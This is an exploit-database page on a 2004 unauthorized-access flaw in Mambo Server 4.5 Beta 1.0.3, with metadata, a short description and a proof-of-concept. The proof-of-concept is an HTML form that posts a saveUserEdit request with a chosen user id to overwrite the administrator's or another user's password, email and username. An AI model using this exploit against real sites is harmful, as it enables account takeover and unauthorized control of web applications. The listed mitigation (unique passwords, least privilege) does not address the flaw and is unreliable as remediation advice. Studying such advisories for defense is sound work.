header-logo
Suggest Exploit
vendor:
Mambo Server
by:
SecurityFocus
7.5
CVSS
HIGH
Unauthorized Access
284
CWE
Product Name: Mambo Server
Affected Version From: Mambo Server version 4.5 Beta 1.0.3
Affected Version To: Other versions could be affected as well.
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2004

Mambo Server Unauthorized Access Vulnerability

It has been reported that Mambo Server may be prone to an unauthorized access vulnerability that may allow an attacker to modify a user and/or an administrator's information such as password, email, name etc, after supplying a legitimate user id.

Mitigation:

Ensure that all users have unique passwords and that they are changed regularly. Ensure that all users are assigned the minimum privileges necessary to perform their job.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9193/info

It has been reported that Mambo Server may be prone to an unauthorized access vulnerability that may allow an attacker to modify a user and/or an administrator's information such as password, email, name etc, after supplying a legitimate user id.

Mambo Server version 4.5 Beta 1.0.3 has been reported to be vulnerable to this issue, however other versions could be affected as well. 

<html>
<head></head>
<body>
<form action="http://www.example.com/index.php" method="post">
New Name : <inputtype="text" name="name" value=""><br>
New E-mail : <input type="text" name="email" value="" size="30"><br>
New UserName : <input type="text" name="username" value=""><br>
New Password : <input type="password" name="password" value=""><br>
Verfiy New Pass : <input type="password" name="verifyPass"><br>
ID : <input type="text" name="id" value="1"><br>
<input type="hidden" name="option" value="com_user">
<input type="hidden" name="task" value="saveUserEdit">
<input type="submit" name="submit" value="Update"><br>
</form>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR